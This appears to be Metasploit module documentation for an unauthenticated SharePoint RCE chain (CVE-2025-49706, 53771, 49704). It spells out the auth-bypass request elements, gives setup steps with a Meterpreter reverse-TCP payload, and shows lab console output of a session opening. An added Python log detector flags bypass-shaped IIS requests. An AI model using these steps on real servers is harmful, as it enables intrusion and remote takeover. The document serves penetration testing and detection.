documentation/modules/exploit/windows/http/sharepoint_toolpane_rce.md
This module exploits the authentication bypass vulnerabilities CVE-2025-49706 and CVE-2025-53771, and an unsafe
deserialization vulnerability CVE-2025-49704, to achieve unauthenticated RCE against a vulnerable Microsoft
SharePoint Server. The vulnerability CVE-2025-53770 was disclosed as being a patch bypass of CVE-2025-49704,
and as described by the finders, CVE-2025-53770 targets a different endpoint within the /_vti_bin/ URI path.
As this exploit module does not target the endpoint associated with CVE-2025-53770 (per the original finders),
we believe this module is best described as exploiting CVE-2025-49704 alone (and not CVE-2025-53770).
CVE-2025-49706 is an authentication bypass affecting Microsoft SharePoint Server, allowing a remote unauthenticated
attacker to reach the ToolPane page, located at the `/_layouts/15/ToolPane.aspx` URI. The auth bypass works if an
attacker supplies the following elements to an HTTP request:

* A `Referer` header of `/_layouts/SignOut.aspx`, `/_layouts/14/SignOut.aspx`, or `/_layouts/15/SignOut.aspx`.
* `DisplayMode` with the value `Edit`.
* A query parameter with the value `/ToolPane.aspx`, so long as this is the last query parameter.
* `MSOTlPn_Uri` with the full URL to the `/_controltemplates/15/AclEditor.ascx` endpoint.

CVE-2025-53771 is a patch bypass for CVE-2025-49706. By appending a trailing `/` to the target
`/_layouts/15/ToolPane.aspx` URI, e.g. `/_layouts/15/ToolPane.aspx/`, a remote unauthenticated attacker can reach
the ToolPane page.
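The request shape described above is what shows up in the web server's access log, so it is also what a defender can hunt for after the fact. The following is an added example (it is not part of the Metasploit module or its documentation) that parses IIS W3C extended log records and flags requests matching the ToolPane bypass pattern: a `ToolPane.aspx` stem (with or without the trailing `/` of CVE-2025-53771), a `SignOut.aspx` referer, `DisplayMode=Edit`, and `/ToolPane.aspx` as the last query parameter. The log lines are constructed for illustration; the field layout is the default IIS W3C set, which records the query string and the `Referer` header but not the POST body, so `MSOTlPn_Uri` is only visible when it is sent in the query string.

```python
"""Flag IIS W3C log entries matching the ToolPane auth-bypass request shape
(CVE-2025-49706 / CVE-2025-53771). Added example; not part of the module.
The sample log below is constructed for illustration."""
from urllib.parse import parse_qsl, urlsplit

SIGNOUT_REFERERS = (
    "/_layouts/SignOut.aspx",
    "/_layouts/14/SignOut.aspx",
    "/_layouts/15/SignOut.aspx",
)
TOOLPANE_PATH = "/_layouts/15/ToolPane.aspx"


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def toolpane_indicators(rec):
    """Return the list of bypass indicators present in a single record."""
    hits = []
    stem = rec.get("cs-uri-stem", "").lower()
    if stem == TOOLPANE_PATH.lower():
        hits.append("toolpane-path")
    elif stem == TOOLPANE_PATH.lower() + "/":
        hits.append("toolpane-path-trailing-slash")  # CVE-2025-53771 variant
    else:
        return hits  # not a ToolPane request; nothing else to check

    referer = rec.get("cs(Referer)", "-")
    ref_path = urlsplit(referer).path if referer != "-" else ""
    if any(ref_path.lower().endswith(s.lower()) for s in SIGNOUT_REFERERS):
        hits.append("signout-referer")

    # IIS stores the raw query string in cs-uri-query ("-" when absent).
    query = rec.get("cs-uri-query", "-")
    params = parse_qsl(query, keep_blank_values=True) if query != "-" else []
    if any(k == "DisplayMode" and v == "Edit" for k, v in params):
        hits.append("displaymode-edit")
    if params and params[-1][1] == "/ToolPane.aspx":
        hits.append("last-param-toolpane")
    if any(k == "MSOTlPn_Uri" and "AclEditor.ascx" in v for k, v in params):
        hits.append("msotlpn-acleditor")
    return hits


def is_bypass_attempt(hits):
    """The bypass needs the SignOut referer together with the query-string
    shape; the path indicator alone is ordinary ToolPane usage."""
    return "signout-referer" in hits and {"displaymode-edit", "last-param-toolpane"} <= set(hits)


def scan(text):
    """Return (c-ip, cs-uri-stem, sc-status, indicators) for each flagged record."""
    out = []
    for rec in parse_w3c(text):
        hits = toolpane_indicators(rec)
        if is_bypass_attempt(hits):
            out.append((rec["c-ip"], rec["cs-uri-stem"], rec["sc-status"], hits))
    return out


# Constructed sample: one benign page load, two bypass-shaped POSTs (second
# one uses the trailing slash), and one authenticated ToolPane edit.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-23 11:58:40 192.168.86.50 GET /_layouts/15/start.aspx - 80 TESTDOMAIN\\alice 192.168.86.10 Mozilla/5.0 - 200 0 0 31
2025-07-23 11:58:41 192.168.86.50 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 80 - 192.168.86.122 Mozilla/5.0 http://192.168.86.50/_layouts/SignOut.aspx 200 0 0 412
2025-07-23 11:58:42 192.168.86.50 POST /_layouts/15/ToolPane.aspx/ DisplayMode=Edit&a=/ToolPane.aspx 80 - 192.168.86.122 Mozilla/5.0 http://192.168.86.50/_layouts/15/SignOut.aspx 200 0 0 398
2025-07-23 11:59:00 192.168.86.50 GET /_layouts/15/ToolPane.aspx DisplayMode=Edit 80 TESTDOMAIN\\bob 192.168.86.11 Mozilla/5.0 http://192.168.86.50/sites/hr/default.aspx 200 0 0 55
"""

if __name__ == "__main__":
    for client, stem, status, hits in scan(SAMPLE_LOG):
        print(f"{client} {stem} -> HTTP {status}: {', '.join(hits)}")
```

A `200` on a flagged record is the interesting case: an unauthenticated request to ToolPane should normally be answered with a `401`, so a `200` here indicates the bypass succeeded rather than merely being attempted. Any `MSOTlPn_Uri` value pointing at `AclEditor.ascx` that does appear in the query string is reported as an additional indicator.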
CVE-2025-49704 is an unsafe deserialization vulnerability due to bypassing a filter list to allow the instantiation of
LosFormatter and ObjectDataProvider in the diffgr:diffgram XML document, allowing us to kick off a second
stage deserialization gadget (which will be a TypeConfuseDelegate + LosFormatter gadget chain).
The July 8, 2025, patch for CVE-2025-49704 did not apply correctly to a SharePoint site that had not also manually run
a SharePoint configuration update. The patch for CVE-2025-49704 did not address the root cause, and instead marked the
Microsoft.PerformancePoint.Scorecards.Client assembly as unsafe. The July 19, 2025, patch for CVE-2025-53770
addresses the root cause of CVE-2025-49704 and does not rely on a manual configuration update being performed in
order to be effective.
This exploit module has been successfully tested against the following versions:

* 16.0.10337.12109 - This is the RTM version. Is vulnerable to all 4 CVEs. Exploitation is reliable.
* 16.0.10417.20018 - This is the June 2025 patch level (KB 5002729). Is vulnerable to all 4 CVEs. Exploitation is reliable.
* 16.0.10417.20027 - This is the July 2025 patch level (KB 5002741). This patched out CVE-2025-49704 and CVE-2025-49706,
  but is vulnerable to CVE-2025-53770 and CVE-2025-53771. Exploitation is reliable unless the site administrator has
  manually performed a configuration update.

Installing Microsoft SharePoint is non-trivial. This setup guide is a great step-by-step tutorial to get up and running.
After you install SharePoint, you must create a new site, bound to a new port. This is what the exploit will target.
NOTE: If you enable HTTPS, you will need to manually set up certificates via IIS Manager.
1. `use exploit/windows/http/sharepoint_toolpane_rce`
2. Configure the target:
   * `set RHOST <TARGET_IP_ADDRESS>`
   * `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>`
   * `set SSL true` (If targeting HTTPS)
3. Configure the payload:
   * NOTE: If testing with the default Meterpreter payloads, you will likely need to disable Defender.
   * `set PAYLOAD cmd/windows/http/x64/meterpreter_reverse_tcp`
   * `set LHOST eth0`
   * `set LPORT 4444`
4. Run the exploit:
   * `check`
   * `exploit`

```
msf exploit(windows/http/sharepoint_toolpane_rce) > show options

Module options (exploit/windows/http/sharepoint_toolpane_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ccMNrNsj         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.86.122   yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.

Exploit target:

   Id  Name
   --  ----
   0   Default

View the full module info with the info, or info -d command.

msf exploit(windows/http/sharepoint_toolpane_rce) > check
[*] 192.168.86.50:80 - The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
msf exploit(windows/http/sharepoint_toolpane_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
[*] Meterpreter session 3 opened (192.168.86.122:4444 -> 192.168.86.50:62290) at 2025-07-23 12:58:41 +0100

meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 24
Meterpreter     : x64/windows
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter >
```
```
msf exploit(windows/http/sharepoint_toolpane_rce) > show options

Module options (exploit/windows/http/sharepoint_toolpane_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   notepad.exe      yes       The command string to execute

Exploit target:

   Id  Name
   --  ----
   0   Default

View the full module info with the info, or info -d command.

msf exploit(windows/http/sharepoint_toolpane_rce) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
[*] Exploit completed, but no session was created.
msf exploit(windows/http/sharepoint_toolpane_rce) >
```
You will be able to observe in Task Manager or Process Explorer that the w3wp.exe process has spawned cmd.exe which
has spawned notepad.exe.